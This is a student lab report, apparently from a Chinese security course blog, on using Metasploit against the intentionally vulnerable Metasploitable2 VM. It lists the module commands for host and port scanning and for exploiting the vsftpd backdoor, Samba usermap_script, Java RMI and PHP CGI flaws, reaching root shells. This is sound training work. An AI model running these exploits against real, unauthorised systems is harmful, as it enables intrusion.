20222410 2024-2025-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

1.1 本周学习内容回顾

Metasploit 是一个功能强大的渗透测试框架,广泛应用于网络安全领域。它为安全专家、渗透测试人员和红队提供了一个全面的工具集,支持漏洞利用、攻击模拟和安全评估。Metasploit 提供了丰富的攻击模块,涵盖了远程代码执行、服务拒绝、提权等多种攻击方式,支持对多种操作系统和应用程序进行测试。除了漏洞利用,它还具备强大的后渗透功能,如键盘记录、文件上传下载、网络嗅探等。通过与其他安全工具的集成,Metasploit 能够帮助用户快速识别、利用并修复潜在的安全漏洞,是网络安全行业中的重要工具之一。

1.2 实验要求

本实践目标是掌握metasploit的用法。

指导书参考Rapid7官网的指导教程。

https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/

下载官方靶机Metasploitable2,完成下面实验内容。

查询靶机IP地址,得到结果为192.168.136.154

2.实验过程

2.1 前期渗透

2.1.1 主机发现(可用Aux中的arp_sweep,search一下就可以use)

search arp_sweep
use 0
set RHOSTS 192.168.136.0/24
set THREADS 30
run

成功查询到靶机(192.168.136.154)

2.1.2 端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等

search portscan/tcp
set ROHSTS 192.168.136.154
run

成功扫描出开放的tcp端口。

2.1.3 扫描系统版本、漏洞

search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.136.154
run

目标主机运行的是一个较旧的 Samba 版本(3.0.20),且使用 SMBv1,可能存在一些已知漏洞。

2.2 Vsftpd源码包后门漏洞(21端口)

漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.136.154
run

run攻击成功执行后,再输入uname –a、 pwd、 id等命令 验证。

2.3 SambaMS-RPC Shell命令注入漏洞(端口139)

漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.136.154
exploit

利用成功 执行uname–a验证

2.4 Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

首先查看1099端口是否打开

根据之前的TCP扫描结果,可以看出1099端口是开放的

search exploit/multi/misc/java_rmi_server
use 0
show options //查看配置参数
set RHOST 192.168.136.154
exploit

运行成功,输入sessions -i 3进入任务
再输入shell,利用whoami命令验证,得到结果root

2.5 PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.136.154
exploit

攻击成功,输入dir验证。

3.问题及解决方案

  • 问题1:在扫描漏洞时,输入search auxiliary/scanner/vuln时报错,提示搜索不到结果。

  • 问题1解决方案:我转而使用实验6中的Nessus软件进行扫描,很快得到扫描结果。

4.学习感悟、思考等

  • 在使用Metasploit进行渗透攻击时,search-use-set-show-run/exploit大法实在是太好用啦!
  • 在本次实验中,靶机存在的漏洞已经提前给出,但是在现实中,我们需要先扫描靶机的漏洞,然后再进行攻击。攻击固然很重要,但是攻击前的信息收集同样重要。
  • 在日常学习生活中,我们要提高网络安全意识,警惕邪恶文件、链接等,像是之前考试中的pdf文件,很容易就让人中招。
posted @ 2024-11-16 10:26  Lelouch-vi  阅读(25)  评论(0编辑  收藏  举报